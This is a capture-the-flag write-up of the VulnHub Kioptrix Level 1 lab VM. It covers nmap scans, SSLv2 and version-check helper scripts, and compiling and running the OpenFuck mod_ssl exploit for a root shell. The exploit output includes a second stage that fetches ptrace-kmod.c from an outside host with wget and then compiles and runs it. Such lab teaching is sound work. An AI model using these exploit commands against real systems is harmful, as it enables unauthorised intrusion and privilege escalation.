
VulnHub - Kioptrix: Level 1 Writeup

Download and Setup

The first step with any VulnHub box is to download the VM image and set it up on our hypervisor.

The image can be downloaded from the VulnHub site.

For my setup I'll be using VMware Workstation Pro 15.5.6.

Fixing the network

When setting up this VM I encountered an issue where my Kali VM was unable to find the Kioptrix VM. I discovered that this could be quickly solved by opening the .vmx file and changing any adapter set to bridged to nat (the ethernet0.connectionType line), so that the box lands on the same virtual network as the Kali VM.

You may not have this issue with your setup, but this solved my issues on VMware!

Scanning the Host

Now that the VM is set up and the network is working we can begin our enumeration. We first need to find the IP of the victim VM.

Finding the IP

First we find the Kali IP address with ifconfig. For this setup the Kali attack machine is 192.168.198.128 with a subnet mask of 255.255.255.0, so the target must be somewhere in 192.168.198.0/24. The command below does a ping sweep (host discovery only, no port scan) of that whole range for active hosts.

sudo nmap -sn 192.168.198.0/24


Now that we know our target is 192.168.198.133 we can look for vulnerable services with an nmap default-script and version scan (-sC -sV).

kali@kali:~$ nmap -sC -sV -T4 192.168.198.133
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 08:28 EDT

Nmap scan report for 192.168.198.133
Host is up (0.0075s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-06-16T12:31:37+00:00; +1m51s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
1024/tcp open  status      1 (RPC #100024)

Nmap done: 1 IP address (1 host up) scanned in 125.78 seconds
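The sslv2 block in that scan is the precondition everything later depends on: an SSLv2 CLIENT-HELLO is answered with a SERVER-HELLO instead of being refused. Below is a small probe that reproduces that check without nmap. It is an added example written for this page, not code from the writeup or from the exploit; the SERVER-HELLO it parses in the test is constructed (a dummy certificate blob and a fixed connection id), and the 192.168.198.133 default in the main block is the lab address from this writeup. The CLIENT-MASTER-KEY that would follow a successful SERVER-HELLO is where the OpenSSL overflow lives; this probe deliberately stops at the SERVER-HELLO and only reports whether SSLv2 is negotiable and which suites the server offers.

```python
"""Minimal SSLv2 CLIENT-HELLO probe: does the server still negotiate SSLv2?"""
import socket
import struct
import sys

# SSLv2 cipher-spec codes (3 bytes each), using the names nmap's sslv2 script prints.
SSL2_CIPHERS = {
    b"\x01\x00\x80": "SSL2_RC4_128_WITH_MD5",
    b"\x02\x00\x80": "SSL2_RC4_128_EXPORT40_WITH_MD5",
    b"\x03\x00\x80": "SSL2_RC2_128_CBC_WITH_MD5",
    b"\x04\x00\x80": "SSL2_RC2_128_CBC_EXPORT40_WITH_MD5",
    b"\x05\x00\x80": "SSL2_IDEA_128_CBC_WITH_MD5",
    b"\x06\x00\x40": "SSL2_DES_64_CBC_WITH_MD5",
    b"\x07\x00\xc0": "SSL2_DES_192_EDE3_CBC_WITH_MD5",
    b"\x08\x00\x80": "SSL2_RC4_64_WITH_MD5",
}
MSG_CLIENT_HELLO = 1
MSG_SERVER_HELLO = 4


def ssl2_record(payload: bytes) -> bytes:
    """Two-byte SSLv2 record header: high bit set (no padding), 15-bit length."""
    if len(payload) >= 0x8000:
        raise ValueError("payload too large for a 2-byte SSLv2 header")
    return struct.pack(">H", 0x8000 | len(payload)) + payload


def build_client_hello(challenge: bytes = b"\x00" * 16) -> bytes:
    """CLIENT-HELLO offering every SSLv2 suite above, with no session id."""
    specs = b"".join(SSL2_CIPHERS)
    body = struct.pack(">BHHHH", MSG_CLIENT_HELLO, 0x0002,
                       len(specs), 0, len(challenge)) + specs + challenge
    return ssl2_record(body)


def parse_server_hello(data: bytes):
    """Return {version, cert_len, ciphers} for an SSLv2 SERVER-HELLO, else None.

    A TLS-only server answers with a TLS alert (first byte 0x15, high bit clear),
    which fails the first check here."""
    if len(data) < 2 or not data[0] & 0x80:
        return None
    length = struct.unpack(">H", data[:2])[0] & 0x7FFF
    body = data[2:2 + length]
    if len(body) < 11 or body[0] != MSG_SERVER_HELLO:
        return None
    _, _sid_hit, _cert_type, version, cert_len, specs_len, _conn_id_len = \
        struct.unpack(">BBBHHHH", body[:11])
    off = 11 + cert_len                      # cipher specs follow the certificate
    specs = body[off:off + specs_len]
    ciphers = [SSL2_CIPHERS.get(specs[i:i + 3], specs[i:i + 3].hex())
               for i in range(0, len(specs), 3)]
    return {"version": version, "cert_len": cert_len, "ciphers": ciphers}


def make_sample_server_hello(cipher_codes, cert: bytes = b"\x30\x03\x02\x01\x01") -> bytes:
    """Constructed SERVER-HELLO used as a stand-in for a live reply (dummy DER cert)."""
    specs = b"".join(cipher_codes)
    conn_id = b"\x11" * 16
    body = struct.pack(">BBBHHHH", MSG_SERVER_HELLO, 0, 1, 0x0002,
                       len(cert), len(specs), len(conn_id)) + cert + specs + conn_id
    return ssl2_record(body)


def recv_record(sock: socket.socket) -> bytes:
    """Read one SSLv2 record, or whatever a non-SSLv2 server sends back."""
    data = b""
    try:
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
            if len(data) >= 2:
                want = 2 + (struct.unpack(">H", data[:2])[0] & 0x7FFF)
                if not data[0] & 0x80 or len(data) >= want:
                    break
    except socket.timeout:
        pass
    return data


def probe(host: str, port: int = 443, timeout: float = 5.0):
    """Send a CLIENT-HELLO and parse the reply; None means no SSLv2 SERVER-HELLO."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello())
        return parse_server_hello(recv_record(sock))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.198.133"  # assumed lab IP
    result = probe(target)
    if result is None:
        print(f"{target}: no SSLv2 SERVER-HELLO (SSLv2 disabled or not an SSL port)")
    else:
        print(f"{target}: SSLv2 supported, {len(result['ciphers'])} suites: "
              + ", ".join(result["ciphers"]))
```

Run it as `python3 sslv2_probe.py 192.168.198.133`; a modern server answers the 2-byte-header hello with a TLS alert or closes the socket, and the probe reports no SERVER-HELLO, which is the result you want to see on anything that is not a lab box.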

HTTP

From our nmap scan we find an HTTP server on port 80. Browsing to it gives the default Red Hat "Test Page for the Apache Web Server", and running gobuster against the port doesn't reveal any content of use. What the server does give away is its version banner (Apache 1.3.20 with mod_ssl/2.8.4 and OpenSSL/0.9.6b) and an enabled TRACE method, and the banner is what we pivot on next.

searchsploit

Running searchsploit against the versions from the banner we find that mod_ssl before 2.8.7 has a remote buffer overflow with a public exploit named OpenFuckV2. Exploit-DB files these entries under CVE-2002-0082, but the banner printed by the exploit itself says it is built on openssl-too-open, which abuses the SSLv2 client master key (KEY_ARG) overflow in OpenSSL 0.9.6d and earlier (CVE-2002-0656); that is why the SSLv2 supported and OpenSSL/0.9.6b lines in the scan matter, and why the exploit is pointed at the HTTPS port rather than port 80.

kali@kali:~$ searchsploit mod_ssl
------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                        |  Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                       | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                            | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                  | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                            | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                            | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow          | unix/remote/40347.txt
------------------------------------------------------------------------------------------------------ ---------------------------------
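Matching banner versions against the cut-offs in those exploit titles is something worth automating rather than eyeballing, especially for OpenSSL's letter-suffixed versions where "0.9.6b" must sort below "0.9.6d" and "0.9.6" below "0.9.6a". The script below is an added example for this page, not the author's tooling: it parses the port table out of nmap's normal output (the sample is constructed from the scan earlier in this post) and flags any mod_ssl older than 2.8.7 or OpenSSL older than 0.9.6d. Those two thresholds are an assumption lifted from the Exploit-DB titles above, not from vendor advisories; adjust CHECKS for whatever searchsploit turns up on a different box.

```python
"""Pull the port table out of nmap's normal output and flag known-old components."""
import re

# Constructed sample: the port table from the nmap -sC -sV scan above. Script output
# lines starting with '|' are ignored by the parser.
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_services(text: str) -> list:
    """One dict per port line: port, proto, state, service, version (banner text)."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version.strip()})
    return rows


def openssl_key(ver: str) -> tuple:
    """Order key for 0.9.x-style OpenSSL versions: '0.9.6b' -> (0, 9, 6, 2), '0.9.6' -> (0, 9, 6, 0)."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)([a-z]?)", ver)
    if not m:
        raise ValueError(f"unrecognised OpenSSL version: {ver!r}")
    a, b, c, letter = m.groups()
    return (int(a), int(b), int(c), (ord(letter) - ord("a") + 1) if letter else 0)


def dotted_key(ver: str) -> tuple:
    """Order key for plain dotted versions such as mod_ssl's '2.8.4'."""
    return tuple(int(x) for x in ver.split("."))


# (component, regex extracting its version from a banner, order key, first fixed version).
# Thresholds are an assumption taken from the Exploit-DB titles in the searchsploit
# listing ("mod_ssl < 2.8.7", "OpenSSL < 0.9.6d"), not from advisory data.
CHECKS = [
    ("mod_ssl", re.compile(r"mod_ssl/(\d+\.\d+\.\d+)"), dotted_key, "2.8.7"),
    ("OpenSSL", re.compile(r"OpenSSL/(\d+\.\d+\.\d+[a-z]?)"), openssl_key, "0.9.6d"),
]


def flag_vulnerable(rows: list) -> list:
    """(port, component, seen version, first fixed version) for every banner below threshold."""
    findings = []
    for row in rows:
        for component, rx, key, fixed in CHECKS:
            m = rx.search(row["version"])
            if m and key(m.group(1)) < key(fixed):
                findings.append((row["port"], component, m.group(1), fixed))
    return findings


if __name__ == "__main__":
    for port, component, seen, fixed in flag_vulnerable(parse_nmap_services(SAMPLE_NMAP)):
        print(f"{port}/tcp: {component} {seen} is older than {fixed}")
```

Feed it real output with `nmap -sV -oN scan.txt target` and `parse_nmap_services(open("scan.txt").read())`; a hit on both 80 and 443 for the same component, as here, just means one Apache instance is listening on both ports.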

Exploiting OpenSSL

Copying the exploit

We can copy the exploit to our current working directory with searchsploit -m 47080. Of the two OpenFuckV2 entries, 47080.c is the newer one and builds against a current libssl without the source edits the original 764.c needs.

Installing dependencies

Before we can compile the exploit we need the OpenSSL development headers, otherwise the build fails at the openssl/*.h includes. Install them with Kali's package manager: sudo apt-get install libssl-dev.

Build the exploit

With the dependency installed, navigate to the folder containing the exploit file and compile it with gcc -o OpenFuck 47080.c -lcrypto (-lcrypto links in OpenSSL's libcrypto for the RC4 and MD5 routines the SSLv2 handshake needs).

Running the exploit

Running ./OpenFuck with no arguments prints its usage, which shows the parameters it needs: ./OpenFuck target box [port] [-c N]. target is a hex identifier for the OS and Apache build (it selects the memory offsets the exploit uses), box is the victim's IP or hostname, port is the SSL port (443 here) and -c N opens N connections before the one that delivers the shellcode.

Finding our target

The first parameter is the target identifier. From our scan we know we have a Red Hat Linux system running Apache 1.3.20, and the exploit's built-in target list has two entries for Red Hat 7.2 with apache-1.3.20-16 (the -16 is the RPM release, which the banner does not show, so both are worth trying).

0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

Constructing our command

Now we know our target we can create our command.

  • Target - 0x6b
  • Box - 192.168.198.133
  • Port - 443
  • Connections (-c N) - 40

Running our constructed command performs the overflow and spawns a shell as the web-server user (note the bash-2.05$ prompt, not a root prompt). The exploit then sends a second-stage command on its own: it fetches ptrace-kmod.c, a local privilege escalation for the ptrace/kmod race in older 2.2 and 2.4 kernels (CVE-2003-0127), compiles it and runs it, which is what gives us root. Because the shell has no job control the echoed command appears scrambled in the output below, and because the source is pulled from packetstormsecurity.net the target VM needs outbound HTTPS and a working gcc for this stage to succeed. If whoami does not come back as root, run the exploit again (with the other target identifier if needed); the second stage is just the wget, gcc and run sequence and can also be repeated by hand.

Getting root

kali@kali:~/Kioptrix$ ./OpenFuck 0x6b 192.168.198.133 443 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--09:21:52--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   1.87 MB/s

09:21:52 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]

/usr/bin/ld: cannot open output file exploit: Permission denied
collect2: ld returned 1 exit status
gcc: file path prefix `/usr/bin' never used

whoami
root
This post is licensed under CC BY 4.0 by the author.